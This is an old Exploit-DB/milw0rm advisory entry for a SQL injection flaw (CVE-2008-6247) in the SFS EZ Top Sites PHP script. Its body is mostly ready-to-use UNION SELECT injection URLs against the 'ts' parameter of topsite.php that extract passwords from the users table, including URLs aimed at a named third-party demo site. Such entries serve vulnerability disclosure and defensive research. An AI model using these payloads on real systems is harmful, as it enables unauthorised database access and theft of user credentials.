SFS EZ Top Sites topsite.php ts Remote SQL Injection Vulnerability

2008-10-31T00:00:00
ID EDB-ID:6920
Type exploitdb
Reporter Stack
Modified 2008-10-31T00:00:00

Description

SFS EZ Top Sites (topsite.php ts) Remote SQL Injection Vulnerability. CVE-2008-6247. Webapps exploit for php platform

                                        
                                            ###########################################################################
# Kira has decide be back after halloween
###########################################################################
# Discovered by : Mountassif Moad
# Type Gap : Sql injection
# Script : SFS EZ Top Sites  Remote sql Injection
# Home Script : http://www.scripts-for-sites.info/item.php?item=112
# Greetz : Allah , All my freind
##########################################################################

http://localhost/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*

Demo :

http://turnkeyzone.com/demos/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
http://turnkeyzone.com/demos/topsites/topsite.php?ts=-169%20union%20select%201,2,3,4,5/*

# milw0rm.com [2008-10-31]